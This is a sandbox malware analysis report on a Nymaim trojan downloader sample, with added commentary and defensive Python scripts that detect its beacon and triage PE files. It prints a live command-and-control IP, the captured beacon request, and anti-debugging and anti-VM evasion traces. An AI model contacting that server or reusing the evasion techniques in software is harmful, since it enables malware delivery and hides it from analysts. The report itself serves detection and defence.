Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1565625
MD5: ac44247e8835b336845ad56b84583656
SHA1: ff499dadf0fd0f90d3e156ba2d521367678be35e
SHA256: e1a6fe984f3ffc681defb85678e20fb0fa1c4afe1a8e99dc974dc3253a04b371
Tags: exe, user-Bitsight

Detection

Nymaim
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Nymaim
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found potential dummy code loops (likely to delay analysis)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to detect virtual machines (SLDT)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 7788 cmdline: "C:\Users\user\Desktop\file.exe" MD5: AC44247E8835B336845AD56B84583656)
  • cleanup
Malware family (Malpedia):
Name: Nymaim
Description: Nymaim is a trojan downloader. It downloads (and runs) other malware on affected systems and was one of the primary malware families hosted on Avalanche. Nymaim is different in that it displays a localized lockscreen while it downloads additional malware. Nymaim is usually delivered by exploit kits and malvertising.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim

Malware configuration (extracted from 0.3.file.exe.4a40000.0.raw.unpack):
{"C2 addresses": ["185.156.72.65", "185.156.72.65", "185.156.72.65", "185.156.72.65"]}
Yara matches

Memory dumps (Source | Rule | Description | Author | Strings):
00000000.00000002.3842703347.00000000047A0000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown | 0x8436:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Nymaim | Yara detected Nymaim | Joe Security | -
00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Smokeloader_3687686f | unknown | unknown | 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Nymaim | Yara detected Nymaim | Joe Security | -
00000000.00000003.1418979529.0000000004A40000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Nymaim | Yara detected Nymaim | Joe Security | -

Unpacked PEs (Source | Rule | Description | Author | Strings):
0.2.file.exe.400000.0.unpack | JoeSecurity_Nymaim | Yara detected Nymaim | Joe Security | -
0.2.file.exe.4950e67.1.raw.unpack | JoeSecurity_Nymaim | Yara detected Nymaim | Joe Security | -
0.3.file.exe.4a40000.0.raw.unpack | JoeSecurity_Nymaim | Yara detected Nymaim | Joe Security | -
0.2.file.exe.400000.0.raw.unpack | JoeSecurity_Nymaim | Yara detected Nymaim | Joe Security | -

Note: the Elastic RedLineStealer and Smokeloader rules each fired on a single code-byte string ($a) in one memory region, and the RedLine string starts with 55 8B EC (push ebp; mov ebp, esp), an ordinary function prologue. The Nymaim classification rests on the Joe Security rule hitting three memory regions and all four unpacked PEs, on the configuration extractor, and on the observed C2 traffic; treat the RedLine and Smokeloader hits as low confidence until corroborated.

No Sigma rule has matched
No Suricata rule has matched


                AV Detection

Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub | Avira URL Cloud: Label: malware (seven hits on memory-string copies of this URL carrying trailing residue: Y, 9, I, ), k, Xy, ion)
Source: 0.3.file.exe.4a40000.0.raw.unpack | Malware Configuration Extractor: Nymaim {"C2 addresses": ["185.156.72.65", "185.156.72.65", "185.156.72.65", "185.156.72.65"]}
Source: file.exe | ReversingLabs: Detection: 36%
Source: file.exe | Virustotal: Detection: 47%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004035D0 CryptAcquireContextW, CryptCreateHash, CryptHashData, GetLastError, CryptDeriveKey, GetLastError, CryptReleaseContext, CryptDecrypt, CryptDestroyKey
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_04953837 CryptAcquireContextW, CryptCreateHash, CryptHashData, GetLastError, CryptDeriveKey, GetLastError, CryptReleaseContext, CryptDecrypt, CryptDestroyKey
Source: file.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00417727 FindFirstFileExW
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0496798E FindFirstFileExW

Note: the function pairs above (0_2_004035D0 / 0_2_04953837 and 0_2_00417727 / 0_2_0496798E), like the string function pair 0040A7A0 / 0495AA07 in the System Summary, differ by exactly 0x4550267, so the 0x0495xxxx addresses are a second copy of the same code placed in the region at 0x04950000 that matched JoeSecurity_Nymaim, not a second routine. The CryptAcquireContextW, CryptCreateHash, CryptHashData, CryptDeriveKey, CryptDecrypt sequence is the CryptoAPI idiom for deriving a key from a hashed passphrase and decrypting an embedded blob.

                Networking

Source: Malware configuration extractor | IPs: 185.156.72.65 (listed four times in the extracted configuration; one unique C2)
Source: Joe Sandbox View | IP Address: 185.156.72.65
Source: Joe Sandbox View | ASN Name: ITDELUXE-ASRU
Source: unknown | TCP traffic detected without corresponding DNS query: 185.156.72.65 (50 connections; the C2 is addressed by IP literal, so no name resolution precedes the traffic)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00401970 HttpAddRequestHeadersA, InternetSetFilePointer, InternetReadFile, HttpQueryInfoA, CoCreateInstance
Source: global traffic | HTTP traffic detected (11 identical requests):
  GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
  User-Agent: 1
  Host: 185.156.72.65
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: file.exe, 00000000.00000002.3841763949.0000000000A49000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub (plus eight copies with trailing residue: ), 9, I, Xy, Y, i, k, y)
Source: file.exe, 00000000.00000002.3841763949.0000000000A1E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubion
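The capture above is the whole network story of the sample: one GET to an IP literal, a one-character User-Agent, Russian Accept-Language, and no DNS. The Python below is an added example, not part of the Joe Sandbox report or of the sample: it rebuilds the captured request from the report's run-together header line (CRLF joining is a reconstruction), de-duplicates the extractor's C2 list, and flags the beacon traits a detection engineer would key on. The User-Agent length threshold and the URI shape test are my own choices.

```python
import ipaddress
from urllib.parse import parse_qs, urlsplit

# The request from the report's capture, re-joined with CRLF (a reconstruction:
# the report prints the headers run together on one line).
SAMPLE_REQUEST = (
    "GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1\r\n"
    "Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, "
    "image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\n"
    "Accept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\n"
    "Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\n"
    "Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\n"
    "User-Agent: 1\r\n"
    "Host: 185.156.72.65\r\n"
    "Connection: Keep-Alive\r\n"
    "Cache-Control: no-cache\r\n"
    "\r\n"
)

# The extractor's output as printed in the report (the one address four times).
EXTRACTED_CONFIG = {"C2 addresses": ["185.156.72.65"] * 4}


def parse_request(raw: str):
    """Split an HTTP/1.x request head into (method, target, version, headers).
    Header names are lower-cased; repeated headers are joined with ', '."""
    lines = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        name, value = name.strip().lower(), value.strip()
        headers[name] = f"{headers[name]}, {value}" if name in headers else value
    return method, target, version, headers


def unique_c2(config: dict) -> list:
    """De-duplicate the extractor's C2 list, keeping first-seen order."""
    return list(dict.fromkeys(config.get("C2 addresses", [])))


def host_is_ip_literal(host: str) -> bool:
    """True when the Host header names an IP rather than a DNS name (optional :port)."""
    bare = host.rsplit(":", 1)[0] if host.count(":") == 1 else host
    try:
        ipaddress.ip_address(bare)
        return True
    except ValueError:
        return False


def beacon_indicators(raw: str, config: dict) -> list:
    """Reasons a request looks like the C2 beacon in the report; empty if none.
    The User-Agent length threshold and the URI shape are assumptions, not report data."""
    method, target, _, h = parse_request(raw)
    host, ua, hits = h.get("host", ""), h.get("user-agent", ""), []
    if host in unique_c2(config):
        hits.append(f"Host {host} is an extracted C2 address")
    if host_is_ip_literal(host):
        hits.append("Host is an IP literal (consistent with TCP traffic and no DNS query)")
    if len(ua) < 8 or ua.isdigit():
        hits.append(f"implausible User-Agent {ua!r}")
    parts = urlsplit(target)
    q = parse_qs(parts.query)
    if method == "GET" and parts.path == "/add" and {"substr", "s", "sub"}.issubset(q):
        hits.append(f"URI matches /add?substr=&s=&sub= beacon shape "
                    f"(substr={q['substr'][0]}, sub={q['sub'][0]})")
    return hits


if __name__ == "__main__":
    for reason in beacon_indicators(SAMPLE_REQUEST, EXTRACTED_CONFIG):
        print(reason)
```

Run against a proxy or sensor log, the same four checks separate this beacon from browser traffic: a legitimate client sends a DNS name in Host, a long User-Agent, and rarely a query string of exactly these three keys.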

                E-Banking Fraud

Source: Yara match | File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.4950e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.file.exe.4a40000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1418979529.0000000004A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

                System Summary

Source: 00000000.00000002.3842703347.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: file.exe | Static PE information: section name: (blank)
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (blank)
Source: C:\Users\user\Desktop\file.exe | Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\file.exe | Code functions (33 unique addresses; 0_2_049551D7 was listed twice): 0_2_00410940, 0_2_0041A346, 0_2_0040EBC7, 0_2_00403D40, 0_2_00415E59, 0_2_0040B6D0, 0_2_00402EE0, 0_2_00404F70, 0_2_0040EF09, 0_2_0041572E, 0_2_005EC05B, 0_2_005E5C01, 0_2_00473086, 0_2_00473544, 0_2_004C2118, 0_2_005F113E, 0_2_004C19B8, 0_2_00536211, 0_2_005566DA, 0_2_005E8A9E, 0_2_005BD28E, 0_2_005EDB13, 0_2_004C0714, 0_2_00499BD4, 0_2_005E6FC3, 0_2_00473BFE, 0_2_049551D7, 0_2_0495EE2E, 0_2_04953FA7, 0_2_04965995, 0_2_0495B937, 0_2_0495F170, 0_2_04960BA7
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 0495AA07 appears 35 times
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 0040A7A0 appears 35 times
Source: file.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 00000000.00000002.3842703347.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: file.exe | Static PE information: Section: (blank) ZLIB complexity 0.9941779458598726
Source: file.exe | Static PE information: Section: goeehmfk ZLIB complexity 0.9919665634110787
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00402A50 VirtualProtect, GetLastError, FormatMessageA, LocalAlloc, OutputDebugStringA, LocalFree, LocalFree, LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_047A8464 CreateToolhelp32Snapshot, Module32First
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00401970 HttpAddRequestHeadersA, InternetSetFilePointer, InternetReadFile, HttpQueryInfoA, CoCreateInstance
Source: C:\Users\user\Desktop\file.exe | Command line argument: nosub (0_2_004087E0)
Source: C:\Users\user\Desktop\file.exe | Command line argument: mixtwo (0_2_004087E0)
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | ReversingLabs: Detection: 36%
Source: file.exe | Virustotal: Detection: 47%
Source: file.exe | String found in binary or memory: /add?substr=
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Sections loaded: apphelp.dll, winmm.dll, msimg32.dll, wininet.dll, msvcr100.dll, iertutil.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: file.exe | Static file information: File size 2027520 > 1048576
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: file.exe | Static PE information: Raw size of goeehmfk is bigger than: 0x100000 < 0x1acc00
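The static findings in this section and the next (a stored checksum of 0x1f9d4c where 0x1f7cae is expected, the entry point in .taggant, blank and random-looking section names, ZLIB complexity above 0.99 for the blank section and goeehmfk, a 0x1acc00-byte raw section) can be reproduced from the headers alone. The Python below is an added example, not tooling from the report or from Joe Sandbox: it walks the PE headers, recomputes the optional-header checksum with the standard word-sum-and-fold algorithm, finds the section that owns the entry point, and scores each section's compressibility. It assumes the report's "ZLIB complexity" is the compressed-to-raw size ratio (my assumption); build_pe assembles a constructed, non-executable PE32 so the checks run offline, and the 0.98 complexity threshold and 1 MiB size cut-off are mine.

```python
import hashlib
import struct
import zlib

# Section names a stock MSVC/MinGW link emits; anything else is worth a look.
STANDARD_SECTIONS = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata",
                     ".edata", ".pdata", ".bss", ".tls", ".CRT", ".xdata"}


def pe_checksum(data: bytes) -> int:
    """Recompute the optional-header CheckSum as the Windows loader would:
    sum 32-bit little-endian words with end-around carry, skip the CheckSum
    field itself, fold to 16 bits, then add the file length."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    checksum_off = e_lfanew + 24 + 64          # PE sig (4) + COFF header (20) + field offset
    padded = data + b"\0" * (-len(data) % 4)
    total = 0
    for off in range(0, len(padded), 4):
        if off == checksum_off:
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total = (total + (total >> 16)) & 0xFFFF
    return total + len(data)


def zlib_complexity(raw: bytes) -> float:
    """Compressed/raw size ratio clamped to 1.0 (assumed to be what the report
    calls 'ZLIB complexity'); packed or encrypted data sits near 1.0."""
    return min(1.0, len(zlib.compress(raw, 9)) / len(raw)) if raw else 0.0


def parse_pe(data: bytes) -> dict:
    """Minimal PE header walk: entry-point RVA, stored checksum, section table."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    nsec = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    opt = e_lfanew + 24
    sections = []
    for i in range(nsec):
        name, vsize, vaddr, rawsize, rawptr = struct.unpack_from("<8sIIII", data, opt + opt_size + i * 40)
        name = name.rstrip(b"\0")
        sections.append({"name": name, "vaddr": vaddr, "vsize": vsize, "rawsize": rawsize,
                         "clean_name": bool(name) and all(0x21 <= b < 0x7F for b in name),
                         "raw": data[rawptr:rawptr + rawsize]})
    return {"entry_rva": struct.unpack_from("<I", data, opt + 16)[0],
            "checksum": struct.unpack_from("<I", data, opt + 64)[0], "sections": sections}


def triage(data: bytes) -> list:
    """Static checks mirroring the report's PE findings; returns readable findings."""
    pe, findings = parse_pe(data), []
    computed = pe_checksum(data)
    # A stored checksum of 0 only means the linker skipped it; non-zero and wrong
    # is the case the report flags (0x1f9d4c stored vs 0x1f7cae expected).
    if pe["checksum"] != computed:
        findings.append(f"checksum mismatch: stored 0x{pe['checksum']:x}, computed 0x{computed:x}")
    ep = next((s for s in pe["sections"]
               if s["vaddr"] <= pe["entry_rva"] < s["vaddr"] + max(s["vsize"], s["rawsize"])), None)
    ep_name = ep["name"] if ep else b"<no section>"
    if ep is None or ep["name"] != b".text":
        findings.append(f"entry point outside .text: {ep_name!r}")
    for s in pe["sections"]:
        label = s["name"].decode("latin-1")
        if not s["clean_name"]:
            findings.append(f"section name blank or non-printable: {label!r}")
        elif label not in STANDARD_SECTIONS:
            findings.append(f"non-standard section name: {label}")
        ratio = zlib_complexity(s["raw"])
        if ratio > 0.98:
            findings.append(f"section {label!r} incompressible (ZLIB complexity {ratio:.3f}): packed or encrypted")
        if s["rawsize"] > 0x100000:
            findings.append(f"section {label!r} raw size 0x{s['rawsize']:x} exceeds 1 MiB")
    return findings


def build_pe(sections, entry_index=0, fix_checksum=True) -> bytes:
    """Assemble a minimal, non-executable PE32 image from (name, body) pairs.
    Constructed test input for the checks above, not a file from the report."""
    n, e_lfanew, opt_size = len(sections), 0x40, 224
    hdr_len = (e_lfanew + 24 + opt_size + 40 * n + 0x1FF) & ~0x1FF
    rva, raw, hdrs, bodies, entry_rva = 0x1000, hdr_len, b"", b"", 0
    for i, (name, body) in enumerate(sections):
        rawsize = (len(body) + 0x1FF) & ~0x1FF           # 0x200 file alignment
        entry_rva = rva if i == entry_index else entry_rva
        hdrs += struct.pack("<8sIIIIIIHHI", name.encode("latin-1"), len(body), rva, rawsize, raw,
                            0, 0, 0, 0, 0x60000020)      # CODE | EXECUTE | READ
        bodies += body.ljust(rawsize, b"\0")
        rva, raw = rva + ((rawsize + 0xFFF) & ~0xFFF), raw + rawsize
    opt = bytearray(opt_size)                            # PE32 optional header, fields by offset
    for off, fmt, val in ((0, "<H", 0x10B), (16, "<I", entry_rva), (28, "<I", 0x400000),
                          (32, "<I", 0x1000), (36, "<I", 0x200), (56, "<I", rva), (60, "<I", hdr_len),
                          (64, "<I", 0xBAD), (68, "<H", 2), (92, "<I", 16)):
        struct.pack_into(fmt, opt, off, val)
    image = bytearray(b"MZ".ljust(0x3C, b"\0") + struct.pack("<I", e_lfanew) + b"PE\0\0"
                      + struct.pack("<HHIIIHH", 0x14C, n, 0, 0, 0, opt_size, 0x0102) + opt + hdrs)
    image += b"\0" * (hdr_len - len(image)) + bodies
    if fix_checksum:                                     # what a normal linker writes
        struct.pack_into("<I", image, e_lfanew + 24 + 64, pe_checksum(bytes(image)))
    return bytes(image)


# Constructed section contents: compressible "code" and 4 KiB of incompressible bytes.
NOPS = b"\x90" * 4096
NOISE = b"".join(hashlib.sha256(i.to_bytes(4, "little")).digest() for i in range(128))
BENIGN = build_pe([(".text", NOPS), (".data", b"\0" * 512)])
# Mimics the sample's layout: random-looking packed section, entry in .taggant, bad checksum.
SUSPICIOUS = build_pe([(".text", NOPS), ("goeehmfk", NOISE), (".taggant", NOPS)],
                      entry_index=2, fix_checksum=False)

if __name__ == "__main__":
    for line in triage(SUSPICIOUS):
        print(line)
```

Against the real file.exe, triage(open(path, "rb").read()) should report the checksum pair the report shows, .taggant as the entry section, the blank names and goeehmfk/ukgkvxbu, and the 0x1acc00-byte section; each of these is an ordinary packer trait, so the value is in the combination, not any one line.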

                Data Obfuscation

                barindex
                Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;goeehmfk:EW;ukgkvxbu:EW;.taggant:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                Source: initial sample Static PE information: section where entry point is pointing to: .taggant
                Source: file.exe Static PE information: real checksum: 0x1f9d4c should be: 0x1f7cae
                Source: file.exe Static PE information: section name:
                Source: file.exe Static PE information: section name: .idata
                Source: file.exe Static PE information: section name:
                Source: file.exe Static PE information: section name: goeehmfk
                Source: file.exe Static PE information: section name: ukgkvxbu
                Source: file.exe Static PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040A237 push ecx; ret 0_2_0040A24A
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00421B7D push esi; ret 0_2_00421B86
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0070407A push ecx; ret 0_2_00704089
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00704030 push esi; ret 0_2_0070403F
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0070483E push esi; ret 0_2_0070484D
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007040D1 push edi; ret 0_2_007040E0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007048DC push eax; iretd 0_2_007048DF
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007088C9 push es; retf 0_2_007088CA
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00704148 push ecx; ret 0_2_00704157
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00704110 push edi; ret 0_2_0070411F
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00707186 push es; iretd 0_2_007071AF
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0070426A push ecx; ret 0_2_00704279
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00707A44 push 256453C2h; mov dword ptr [esp], edi 0_2_00707ADA
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00707A44 push ecx; mov dword ptr [esp], ebx 0_2_00707AFA
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00707A44 push 089A6BD1h; mov dword ptr [esp], eax 0_2_00707B28
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00705AFD push 197958A1h; mov dword ptr [esp], ecx 0_2_00705B5D
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00705AFD push 6515846Ch; mov dword ptr [esp], ebp 0_2_00705BE0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00705AD7 push 197958A1h; mov dword ptr [esp], ecx 0_2_00705B5D
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00705AD7 push 6515846Ch; mov dword ptr [esp], ebp 0_2_00705BE0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00705AB5 push 197958A1h; mov dword ptr [esp], ecx 0_2_00705B5D
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00705AB5 push 6515846Ch; mov dword ptr [esp], ebp 0_2_00705BE0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007042B6 push ebp; ret 0_2_007042C5
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00707AA5 push 256453C2h; mov dword ptr [esp], edi 0_2_00707ADA
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00707AA5 push ecx; mov dword ptr [esp], ebx 0_2_00707AFA
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00707AA5 push 089A6BD1h; mov dword ptr [esp], eax 0_2_00707B28
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00705A9D push 197958A1h; mov dword ptr [esp], ecx 0_2_00705B5D
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00705A9D push 6515846Ch; mov dword ptr [esp], ebp 0_2_00705BE0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00707A81 push 256453C2h; mov dword ptr [esp], edi 0_2_00707ADA
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00707A81 push ecx; mov dword ptr [esp], ebx 0_2_00707AFA
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00707A81 push 089A6BD1h; mov dword ptr [esp], eax 0_2_00707B28
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00705A88 push 197958A1h; mov dword ptr [esp], ecx 0_2_00705B5D
                Source: file.exe Static PE information: section name: entropy: 7.933164122793504
                Source: file.exe Static PE information: section name: goeehmfk entropy: 7.950296707556539

                Boot Survival

                Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
                Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
                Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass
                Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
                Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
                Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass
                Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass
                Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
                Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine
                Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 473CDC second address: 473CEC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C544CAC2Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F5237 second address: 5F523E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F523E second address: 5F5244 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F5244 second address: 5F5249 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F5249 second address: 5F5253 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F6C544CAC2Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
